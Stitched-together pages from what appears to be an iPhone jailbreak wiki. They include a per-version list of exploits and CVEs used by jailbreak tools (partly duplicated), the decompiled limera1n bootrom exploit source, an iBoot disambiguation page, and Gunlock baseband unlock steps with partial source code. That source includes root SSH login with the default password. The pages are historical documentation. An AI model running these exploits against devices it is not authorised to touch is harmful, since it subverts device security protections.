12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.4)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

===[[unc0ver]] (14.0 - 14.3)===

* ivac entry use-after-free ({{cve|2021-1782}})

Limera1n Exploit

2021-04-09T12:57:40Z

Inflatable Man: Added that the iPhone 4 is also vulnerable to SHAtter

{{lowercase}}
The '''limera1n exploit''' is the [[bootrom]] and [[iBoot (Bootloader)|iBoot]] exploit used to run unsigned code (and thereby jailbreak) the [[N18AP|iPod touch (3rd generation)]], the [[N88AP|iPhone 3GS]] and all [[S5L8930|A4]]-based devices. First used in the [[limera1n]] tool by [[User:geohot|geohot]], it can perform a [[tethered jailbreak]] on the aforementioned devices. The jailbreak can then be turned into an [[untethered jailbreak]] with other exploits, such as the [[0x24000 Segment Overflow]] or the [[Packet Filter Kernel Exploit]].

limera1n was the most recent publicly disclosed bootrom exploit until the disclosure of the [[alloc8 Exploit]] in April 2017. The last device released vulnerable to limera1n is the [[N90BAP|iPhone 4 (iPhone3,2)]], and it remains the only publicly disclosed bootrom exploit, other than [[SHAtter]], for this device as well as all other variants of the [[iPhone 4]].

==Source Code==
signed int __cdecl upload_exploit() {
int device_type;
signed int payload_address;
int free_address;
int deviceerror;
char *chunk_headers_ptr;
unsigned int sent_counter;
//int v6;
signed int result;
//signed int v8;
int recv_error_code;
signed int payload_address2;
signed int padding_size;
char payload;
char chunk_headers;
//int v14;
//v14 = *MK_FP(__GS__, 20);
device_type = *(_DWORD *)(device + 16);

if ( device_type == 8930 ) {
padding_size = 0x2A800;
payload_address = 0x8402B001;
free_address = 0x8403BF9C;
} else {
payload_address = 0x84023001;
padding_size = 0x22800;
// free_address = (((device_type == 8920) – 1) & 0xFFFFFFF4) – 0x7BFCC05C;
if(device_type == 8920) free_address = 0x84033FA4;
else free_address = 84033F98;
}

memset(&payload, 0, 0x800);
memcpy(&payload, exploit, 0x230);

if (libpois0n_debug) {
//v8 = payload_address;
fprintf(stderr, 1, "Resetting device counters\n");
//payload_address = v8;
}

payload_address2 = payload_address;
deviceerror = irecv_reset_counters(client);

if ( deviceerror ) {
irecv_strerror(deviceerror);
fprintf(stderr, 1, &aCannotFindS[12]);
result = -1;
} else {
memset(&chunk_headers, 0xCC, 0x800);
chunk_headers_ptr = &chunk_headers;

do {
*(_DWORD *)chunk_headers_ptr = 1029;
*((_DWORD *)chunk_headers_ptr + 1) = 257;
*((_DWORD *)chunk_headers_ptr + 2) = payload_address2;
*((_DWORD *)chunk_headers_ptr + 3) = free_address;
chunk_headers_ptr += 64;
} while ((int *)chunk_headers_ptr != &v14);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending chunk headers\n");

sent_counter = 0;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
memset(&chunk_headers, 0xCC, 0x800);

do {
sent_counter += 0x800;
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);
} while (sent_counter < padding_size);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending exploit payload\n");

irecv_control_transfer(client, 0x21, 1, 0, 0, &payload, 0x800);

if (libpois0n_debug)
fprintf(stderr, 1, "Sending fake data\n");

memset(&chunk_headers, 0xBB, 0x800);
irecv_control_transfer(client, 0xA1, 1, 0, 0, &chunk_headers, 0x800);
irecv_control_transfer(client, 0x21, 1, 0, 0, &chunk_headers, 0x800);

if (libpois0n_debug)
fprintf(stderr, 1, "Executing exploit\n");

irecv_control_transfer(client, 0x21, 2, 0, 0, &chunk_headers, 0);
irecv_reset(client);
irecv_finish_transfer(client);

if (libpois0n_debug) {
fprintf(stderr, 1, "Exploit sent\n");
if (libpois0n_debug)
fprintf(stderr, 1, "Reconnecting to device\n");
}

client = (void *)irecv_reconnect(client, 2);

if (client) {
result = 0;
} else {
if (libpois0n_debug) {
recv_error_code = irecv_strerror(0);
fprintf(stderr, 1, &aCannotFindS[12], recv_error_code);
}
fprintf(stderr, 1, "Unable to reconnect\n");
result = -1;
}
}

// compiler stack check
//if (*MK_FP(__GS__, 20) != v14)
// __stack_chk_fail(v6, *MK_FP(__GS__, 20) ^ v14);

return result;
}

[[Category:Exploits]]
[[Category:Bootrom Exploits]]

IBoot

2021-03-30T18:33:25Z

Inflatable Man: Added which chips LLB is present in

{{lowercase}}
'''iBoot''' is the name of Apple’s bootloader. Its components are implemented in both hardware and software, and the term '''iBoot''' may refer to one of the following, which all have '''iBoot-''' in their version strings:
* [[Bootrom]] (SecureROM), the hardware implementation
* Any of the four variants of the software implementation:
:* [[iBEC]] (iBoot Epoch Change; called iBootStage2 in iOS 10 and later)
:* [[iBoot (Bootloader)|iBoot second-stage loader]] (often called simply ''iBoot'')
:* [[iBSS]] (iBoot Single Stage; called iBootStage1 in iOS 10 and later)
:* [[LLB]] (Low Level Bootloader or iBoot first-stage loader in A9 or earlier)

The software implementations are built from the same source, but with different build parameters, as shown in the comparison table below.

{| class="wikitable"
|-
! rowspan=2 | Product !! colspan=7 | Modules !! rowspan=2 | Text bank !! rowspan=2 | Options
|-
! BOOT !! CONSOLE !! DFU !! DISPLAY !! FILESYSTEM !! FIRMWARE !! RECOVERY
|-
| iBoot || {{yes}} || {{no}} || {{no}} || {{yes}} || {{yes}} || {{no}}*** || {{yes}} || sdram || recovery, boot, filesystem, restore_strap
|-
| iBEC || {{yes}} || {{no}} || {{no}} || {{no}} || {{yes}} || {{no}}*** || {{yes}} || sdram || recovery, boot, filesystem, restore_boot
|-
| iBSS || {{yes}}* || {{no}}** || {{yes}} || {{no}} || {{no}} || {{no}}*** || {{yes}}* || sram || dfu, restore_strap, recovery*, boot*, restore_boot*, console**
|-
| LLB || {{no}} || {{no}}** || {{yes}} || {{no}} || {{no}} || {{yes}} || {{no}} || sram || dfu, restore_strap, console**
|}
<nowiki>*</nowiki> Not included in special development builds 
<nowiki>**</nowiki> Included in special development builds 
<nowiki>***</nowiki> Included through the BOOT module, which consists of the submodules FIRMWARE, NVRAM, RAMDISK and SYSCFG.

{{Disambig}}

Jailbreak Exploits

2021-03-29T14:20:55Z

Inflatable Man: /* unc0ver (14.0 - 14.3) */ Add description of vulnerability since there is no exploit title

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.4)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

===[[unc0ver]] (14.0 - 14.3)===

* ivac entry use-after-free ({{cve|2021-1782}})

Gunlock

2021-03-22T00:10:53Z

Inflatable Man: /* Instructions */ Remove broken link

It was the first implementation of the [[Minus 0x20000 with Back Extend Erase]] exploit. In the first version of this unlock, Airplane Mode had to be switched on. If it was not, your phone would enter a boot loop upon updating to 1.1.3.

== Credit ==

[[User:Geohot|geohot]]

== Instructions ==
# Download gunlock and the secpack from http://iphonejtag.blogspot.com/, and the 4.02.13 fls from http://george.zjlotto.com/index.php/baseband/
# Downgrade your phone to 1.0.2. See all the great tutorials online to do this. Your baseband won't be downgraded, this is normal. This will probably work on other versions too, but 1.0.2 doesn't lose wifi on bb access.
# Kill CommCenter and run "gunlock secpack ICE04.02.13_G.fls"
# Reload CommCenter. For some reason my phone was in brick mode. Use the elite team bricktool to get out.
# Enjoy your 1.1.2 OTB unlocked iPhone

if you dont want to downgrade to 1.0.2 try

#unlock and the secpack from http://iphonejtag.blogspot.com/ or the blog and the 4.02.13 fls from http://george.zjlotto.com/index.php/baseband/
# Upgrade to 1.1.2 and jailbreak ( must not be on 1.1.3 )
# install ssh
#upload all downloaded files to /usr/bin and set all permissions to 755
#chmod +x gunlock
#chmod +x gunlock.c
#Log to your phone trough terminal and follow this commands one by one:
#ssh root@iPhone ip address
#password: alpine
#launchctl unload /System/Library/LaunchDaemons/com.apple.CommCenter.plist
#cd /usr/bin
#/gunlock secpack ICE04.02.13_G.fls
#launchctl load /System/Library/LaunchDaemons/com.apple.CommCenter.plist

== version info ==

1.1.2 [http://hotfile.com/dl/77798761/636ab70/1.1.2.zip.html]

1.1.3 [http://hotfile.com/dl/77799157/b1a00c2/1.1.3.zip.html]

the exploit was updated for 1.1.4 ( removed the need for a new secpack ) [http://winandmac.com/files/iphone/114unlock.rar] or [http://hotfile.com/dl/77799557/cfd78b6/1.1.4.zip.html]

== Road blocks ==
* Send the 1.1.3 [[secpack]] to erase 1.1.2
* Second exploit, the fake secpack erase range
** If a valid [[secpack]] is present in 0x3C0000, the phone won't boot. And since endpack doesn't work, I needed to find another way.

== source code ==

//geohot's 112 otb unlocker
//this code is GPLed
#include <stdio.h>
#include <stdlib.h>
#include <termios.h>
#include <unistd.h>
#include <fcntl.h>
#include <IOKit/IOKitLib.h>
#include <sys/ioctl.h>
#include <strings.h>
#include <errno.h>
#include <mach/mach_time.h>
struct termios term;
int hlen,t,u,fp;
unsigned char *data, *secpack;
FILE *f;
int adrcount;
int openport(int speed)
{
int fd = open("/dev/tty.baseband", O_RDWR | 0x20000 | O_NOCTTY);
unsigned int blahnull = 0;
unsigned int handshake = TIOCM_DTR | TIOCM_RTS | TIOCM_CTS | TIOCM_DSR;
if(fd == -1)
{
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}
ioctl(fd, 0x2000740D);
fcntl(fd, 4, 0);
tcgetattr(fd, &term);
ioctl(fd, 0x8004540A, &blahnull);
cfsetspeed(&term, speed);
cfmakeraw(&term);
term.c_cc[VMIN] = 0;
term.c_cc[VTIME] = 5;
term.c_iflag = (term.c_iflag & 0xFFFFF0CD) | 5;
term.c_oflag = term.c_oflag & 0xFFFFFFFE;
term.c_cflag = (term.c_cflag & 0xFFFC6CFF) | 0x3CB00;
term.c_lflag = term.c_lflag & 0xFFFFFA77;
term.c_cflag = (term.c_cflag & ~CSIZE) | CS8;
term.c_cflag &= ~PARENB;
term.c_lflag &= ~ECHO;
tcsetattr(fd, TCSANOW, &term);
ioctl(fd, TIOCSDTR);
ioctl(fd, TIOCCDTR);
ioctl(fd, TIOCMSET, &handshake);
return fd;
}
void resetbaseband()
{
kern_return_t result;
mach_port_t masterPort;
result = IOMasterPort(MACH_PORT_NULL, &masterPort);
CFMutableDictionaryRef matchingDict = IOServiceMatching("AppleBaseband");
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, matchingDict);
io_connect_t conn;
result = IOServiceOpen(service, mach_task_self(), 0, &conn);
result = IOConnectCallScalarMethod(conn, 0, 0, 0, 0, 0);
IOServiceClose(conn);
}
void getheader(unsigned int timeout)
{
fd_set nfp;
FD_ZERO(&nfp);
FD_SET(fp, &nfp);
struct timeval tv;
tv.tv_sec=0;
tv.tv_usec=timeout*1000;
hlen=0;
while(select(fp+1,&nfp,0,0,&tv)>0)
{
hlen+=read(fp,data+hlen, 0x10064-hlen);
//printf("Attempting to read[%d]...%x %x\n",hlen,data[0],data[1]);
}
}
void getcommand() //will return when done
{
int maxlength=6;
hlen=0;
while(hlen<maxlength)
{
hlen+=read(fp,data+hlen, 6);
}
maxlength+=data[5]*0x100+data[4]+4; //2 for checksum and 2 for end
while(hlen<maxlength)
{
hlen+=read(fp,data+hlen, 0x10064-hlen);
}
}
struct termios options;
void openbaseband()
{
int t1=0;
int t2=0x126;
fp=open("/dev/tty.baseband",0x20002);
ioctl(fp,0x2000740D);
fcntl(fp,4,0);
